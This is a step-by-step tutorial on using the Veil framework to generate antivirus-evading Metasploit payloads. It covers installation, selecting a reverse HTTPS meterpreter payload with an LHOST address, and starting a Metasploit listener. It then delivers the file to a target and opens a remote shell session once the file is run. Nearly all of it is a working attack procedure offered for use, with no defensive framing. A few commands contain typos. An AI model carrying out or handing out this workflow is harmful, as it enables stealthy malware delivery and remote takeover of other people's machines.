Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.

Veil Logo

Installation

1. Run the commands below and wait for installation to complete

  • sudo apt-get -y install git
  • git clone https://github.com/Veil-Framework/Veil.git
  • cd Veil/
  • ./config/setup.sh –force –silent

2. Upon completion. You can run the application with the command

  • ./Veil.py

3. If you ever need to change or update the config you can modify/run the file named /config/update-config.py. (This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update)

  • cd config/
  • sudo ./update-config.py

Using the interface

1. When the application is run, we will get to the main menu where we are shown interested information

  • application version
  • Available tools
  • Available commands

2. list available tools

  • list

3. We can gather information about the available tools

  • info Evasion
  • info Ordnance

4. Show variables and configuration

  • options

5. Select a tool

  • use Evation

6. Now within the module the available commands change for the module. To check a hash against virustotal hashes (not recommended, since virustotal can redistribute the hash to antivirus)

  • checkvt <hash>

7. Listing the available payloads

  • list

8. To check upon the options and variables available within payloads

  • info python/meterpreter/rev_https.py

9. Select a module by number ID

  • use 7

10. Set the payload options, and generate the file, assign a name to the file also

  • set LHOST 192.168.0.8
  • generate

11. We know the files were stored in the /var/lib/veil/output directory. We need to integrate it with Metasploit

  • msfdb init
  • msfconsole

12. Now import the Metasploit script created by Veil, it will start a listener

  • resource /var/lib/veil/output/handlers/payload.rc

13. Have the file delivered, and, wait for a client to execute it. You will see session log in Metasploit

  • sessions

14. Accessing the current session

  • sessions -i 1
  • sysinfo
  • shell